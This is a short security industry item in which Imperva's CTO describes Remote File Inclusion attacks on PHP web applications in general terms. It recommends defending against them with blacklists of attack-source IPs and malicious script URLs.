The first, of what will be a monthly inside scope, looks at an attack which usually flies under the radar – Remote File Inclusion (RFI).
Amichai Shulman, Imperva’s co-founder and CTO, believes, “Although these attacks have the potential to cause as much damage as the more popular SQL Injection and Cross-Site Scripting (XSS) attacks, they are
not widely discussed and they need to be!”
Speaking about the attack format itself, Amichai explains, “Remote File Inclusion (RFI) is an attack that targets the computer servers that run web sites and their applications. RFI usually exploits the PHP programming language - used by many large firms including Facebook and SugarCRM. RFI works by exploiting applications that reference files hosted on different servers and, as PHP doesn’t properly
sanitise the input to these requests, an RFI attack replaces these references with links to websites that are under the attacker’s control and can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.”
Amichai provides the following advice, “The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web application. From our observations, it is apparent that can we can improve the detection and blocking of such attacks by creating a blacklist of attack sources and a black list of URLs of remotely included malicious scripts. By having advanced knowledge of RFI attack sources allows the WAF to block an attack before it even begins. By creating a blacklist of the referenced URL enables the WAF to block exploits targeting zero-day vulnerabilities of applications. Finally, the blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources.”
Imperva's HII has documented examples of automated attack campaigns launched in the wild. This report pinpoints their common traits and techniques, as well as the role blacklisting can play in mitigating them and can be viewed by visiting blog.imperva.com.